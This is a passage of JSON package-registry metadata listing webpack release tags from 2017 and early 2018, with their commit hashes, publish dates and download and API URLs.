fbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/web